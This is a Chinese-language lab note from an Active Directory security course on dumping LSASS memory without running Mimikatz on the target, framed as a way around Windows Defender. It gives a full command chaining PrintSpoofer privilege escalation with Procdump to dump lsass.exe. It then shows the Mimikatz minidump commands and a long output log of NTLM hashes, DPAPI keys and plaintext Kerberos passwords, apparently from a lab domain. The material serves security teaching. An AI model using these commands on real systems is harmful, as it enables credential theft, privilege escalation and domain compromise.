NTUSTISC - AD Note - Lab(其他方法得到lsass.dmp)

NTUSTISC - AD Note - Lab(其他方法得到lsass.dmp)

[TOC]

Lecture Video: 2022/05/04 AD 安全1

Background

有了Mimikatz也不一定能夠用,因為Windows的defender也知道這是個好用的東西,對於攻擊方而言,所以會盡可能的直接刪除,那要怎麼bypass或用其他方法把LSASS帶走?

Lab

==Take LSASS with other ways==

方法一

在windows工作管理員中,找到Local Security Authority Process(LSASS),右鍵選==建立傾印檔案==,就可以直接dump memory,然後再把這一份檔案丟到自己可以開mimikatz的電腦,就可以分析了,會有一樣的效果

方法二

如果沒有GUI的話,也可以考慮直接使用Procdump,當然你必須要取得足夠的權限,要不就是用前面提到的IIS提權執行指令,不然就直接切換administrator帳戶,我是用前者 Command: c:\tools\PrintSpoofer64.exe -c "c:\windows\system32\cmd.exe /c c:\tools\Procdump\procdump.exe -accepteula -ma lsass.exe lsass.dmp > c:\inetpub\wwwroot\tmp.txt" 可以看到它放在C:\Windows\system32\lsass.dmp

透過Minidump獲取資訊

有了前面的lsass.dmp,就可以繼續使用mimikatz得到一些有用的資訊,只是,指令稍微有點不太一樣,因為我們不用對lsass進行debug

1
2
$ Sekurlsa::minidump "<path to lsass.dmp>"
$ Sekurlsa::logonPasswords

:::spoiler Result

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
mimikatz # Sekurlsa::minidump "C:\Windows\system32\lsass.dmp"
Switch to MINIDUMP : 'C:\Windows\system32\lsass.dmp'

mimikatz # log
Using 'mimikatz.log' for logfile : OK

mimikatz # Sekurlsa::logonPasswords
Opening : 'C:\Windows\system32\lsass.dmp' file for minidump...

Authentication Id : 0 ; 2913881 (00000000:002c7659)
Session           : Service from 0
User Name         : DefaultAppPool
Domain            : IIS APPPOOL
Logon Server      : (null)
Logon Time        : 2023/9/5 上午 11:49:20
SID               : S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415
        msv :
         [00000003] Primary
         * Username : DESKTOP-G95U93T$
         * Domain   : kuma
         * NTLM     : 5648c9d78a770f3e0f727a5fac99da5a
         * SHA1     : 074499733e91d086762a4bc2df67f5fa51c43221
        tspkg :
        wdigest :
         * Username : DESKTOP-G95U93T$
         * Domain   : kuma
         * Password : (null)
        kerberos :
         * Username : DESKTOP-G95U93T$
         * Domain   : kuma.org
         * Password : maj"2g<h(&iQZ7kqFHQ4X&c;_wQq3V;*gq.(A=4&)eesNp8S=W)C,"nM:ns?6m.%;K4+CSGDFew>VaNQ;N_)?mB1\P9udE7Gs'Lsr ccxo*CyL=JdK"'kF
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 2569783 (00000000:00273637)
Session           : CachedInteractive from 1
User Name         : Administrator
Domain            : kuma
Logon Server      : WIN-818G5VCOLJO
Logon Time        : 2023/9/5 上午 11:39:37
SID               : S-1-5-21-306106713-2531972042-334329499-500
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : kuma
         * NTLM     : 7ecffff0c3548187607a14bad0f88bb1
         * SHA1     : 47af9144ed0e6f8964c1453dc7c2219dbdf046f0
         * DPAPI    : cf967ea9c9c0f9d58b79fdd040270648
        tspkg :
        wdigest :
         * Username : Administrator
         * Domain   : kuma
         * Password : (null)
        kerberos :
         * Username : Administrator
         * Domain   : KUMA.ORG
         * Password : 1qaz@WSX3edc
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 1145006 (00000000:001178ae)
Session           : CachedInteractive from 1
User Name         : Administrator
Domain            : kuma
Logon Server      : WIN-818G5VCOLJO
Logon Time        : 2023/9/5 上午 12:43:30
SID               : S-1-5-21-306106713-2531972042-334329499-500
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : kuma
         * NTLM     : 7ecffff0c3548187607a14bad0f88bb1
         * SHA1     : 47af9144ed0e6f8964c1453dc7c2219dbdf046f0
         * DPAPI    : cf967ea9c9c0f9d58b79fdd040270648
        tspkg :
        wdigest :
         * Username : Administrator
         * Domain   : kuma
         * Password : (null)
        kerberos :
         * Username : Administrator
         * Domain   : KUMA.ORG
         * Password : 1qaz@WSX3edc
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 419256 (00000000:000665b8)
Session           : Interactive from 1
User Name         : bear
Domain            : kuma
Logon Server      : WIN-818G5VCOLJO
Logon Time        : 2023/9/5 上午 12:29:31
SID               : S-1-5-21-306106713-2531972042-334329499-2101
        msv :
         [00000003] Primary
         * Username : bear
         * Domain   : kuma
         * NTLM     : 7ecffff0c3548187607a14bad0f88bb1
         * SHA1     : 47af9144ed0e6f8964c1453dc7c2219dbdf046f0
         * DPAPI    : 4057a0d0b94378dd03224e8b3d28a006
        tspkg :
        wdigest :
         * Username : bear
         * Domain   : kuma
         * Password : (null)
        kerberos :
         * Username : bear
         * Domain   : KUMA.ORG
         * Password : (null)
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 995 (00000000:000003e3)
Session           : Service from 0
User Name         : IUSR
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2023/9/5 上午 12:22:35
SID               : S-1-5-17
        msv :
        tspkg :
        wdigest :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos :
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2023/9/5 上午 12:22:24
SID               : S-1-5-19
        msv :
        tspkg :
        wdigest :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 70310 (00000000:000112a6)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2023/9/5 上午 12:22:24
SID               : S-1-5-90-0-1
        msv :
         [00000003] Primary
         * Username : DESKTOP-G95U93T$
         * Domain   : kuma
         * NTLM     : 5648c9d78a770f3e0f727a5fac99da5a
         * SHA1     : 074499733e91d086762a4bc2df67f5fa51c43221
        tspkg :
        wdigest :
         * Username : DESKTOP-G95U93T$
         * Domain   : kuma
         * Password : (null)
        kerberos :
         * Username : DESKTOP-G95U93T$
         * Domain   : kuma.org
         * Password : maj"2g<h(&iQZ7kqFHQ4X&c;_wQq3V;*gq.(A=4&)eesNp8S=W)C,"nM:ns?6m.%;K4+CSGDFew>VaNQ;N_)?mB1\P9udE7Gs'Lsr ccxo*CyL=JdK"'kF
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 70283 (00000000:0001128b)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2023/9/5 上午 12:22:24
SID               : S-1-5-90-0-1
        msv :
         [00000003] Primary
         * Username : DESKTOP-G95U93T$
         * Domain   : kuma
         * NTLM     : 5648c9d78a770f3e0f727a5fac99da5a
         * SHA1     : 074499733e91d086762a4bc2df67f5fa51c43221
        tspkg :
        wdigest :
         * Username : DESKTOP-G95U93T$
         * Domain   : kuma
         * Password : (null)
        kerberos :
         * Username : DESKTOP-G95U93T$
         * Domain   : kuma.org
         * Password : maj"2g<h(&iQZ7kqFHQ4X&c;_wQq3V;*gq.(A=4&)eesNp8S=W)C,"nM:ns?6m.%;K4+CSGDFew>VaNQ;N_)?mB1\P9udE7Gs'Lsr ccxo*CyL=JdK"'kF
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : DESKTOP-G95U93T$
Domain            : kuma
Logon Server      : (null)
Logon Time        : 2023/9/5 上午 12:22:21
SID               : S-1-5-20
        msv :
         [00000003] Primary
         * Username : DESKTOP-G95U93T$
         * Domain   : kuma
         * NTLM     : 5648c9d78a770f3e0f727a5fac99da5a
         * SHA1     : 074499733e91d086762a4bc2df67f5fa51c43221
        tspkg :
        wdigest :
         * Username : DESKTOP-G95U93T$
         * Domain   : kuma
         * Password : (null)
        kerberos :
         * Username : desktop-g95u93t$
         * Domain   : KUMA.ORG
         * Password : (null)
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 46383 (00000000:0000b52f)
Session           : Interactive from 0
User Name         : UMFD-0
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 2023/9/5 上午 12:22:20
SID               : S-1-5-96-0-0
        msv :
         [00000003] Primary
         * Username : DESKTOP-G95U93T$
         * Domain   : kuma
         * NTLM     : 5648c9d78a770f3e0f727a5fac99da5a
         * SHA1     : 074499733e91d086762a4bc2df67f5fa51c43221
        tspkg :
        wdigest :
         * Username : DESKTOP-G95U93T$
         * Domain   : kuma
         * Password : (null)
        kerberos :
         * Username : DESKTOP-G95U93T$
         * Domain   : kuma.org
         * Password : maj"2g<h(&iQZ7kqFHQ4X&c;_wQq3V;*gq.(A=4&)eesNp8S=W)C,"nM:ns?6m.%;K4+CSGDFew>VaNQ;N_)?mB1\P9udE7Gs'Lsr ccxo*CyL=JdK"'kF
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 46347 (00000000:0000b50b)
Session           : Interactive from 1
User Name         : UMFD-1
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 2023/9/5 上午 12:22:20
SID               : S-1-5-96-0-1
        msv :
         [00000003] Primary
         * Username : DESKTOP-G95U93T$
         * Domain   : kuma
         * NTLM     : 5648c9d78a770f3e0f727a5fac99da5a
         * SHA1     : 074499733e91d086762a4bc2df67f5fa51c43221
        tspkg :
        wdigest :
         * Username : DESKTOP-G95U93T$
         * Domain   : kuma
         * Password : (null)
        kerberos :
         * Username : DESKTOP-G95U93T$
         * Domain   : kuma.org
         * Password : maj"2g<h(&iQZ7kqFHQ4X&c;_wQq3V;*gq.(A=4&)eesNp8S=W)C,"nM:ns?6m.%;K4+CSGDFew>VaNQ;N_)?mB1\P9udE7Gs'Lsr ccxo*CyL=JdK"'kF
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 45411 (00000000:0000b163)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2023/9/5 上午 12:22:17
SID               :
        msv :
         [00000003] Primary
         * Username : DESKTOP-G95U93T$
         * Domain   : kuma
         * NTLM     : 5648c9d78a770f3e0f727a5fac99da5a
         * SHA1     : 074499733e91d086762a4bc2df67f5fa51c43221
        tspkg :
        wdigest :
        kerberos :
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : DESKTOP-G95U93T$
Domain            : kuma
Logon Server      : (null)
Logon Time        : 2023/9/5 上午 12:22:17
SID               : S-1-5-18
        msv :
        tspkg :
        wdigest :
         * Username : DESKTOP-G95U93T$
         * Domain   : kuma
         * Password : (null)
        kerberos :
         * Username : desktop-g95u93t$
         * Domain   : KUMA.ORG
         * Password : (null)
        ssp :
        credman :
        cloudap :

:::

Reference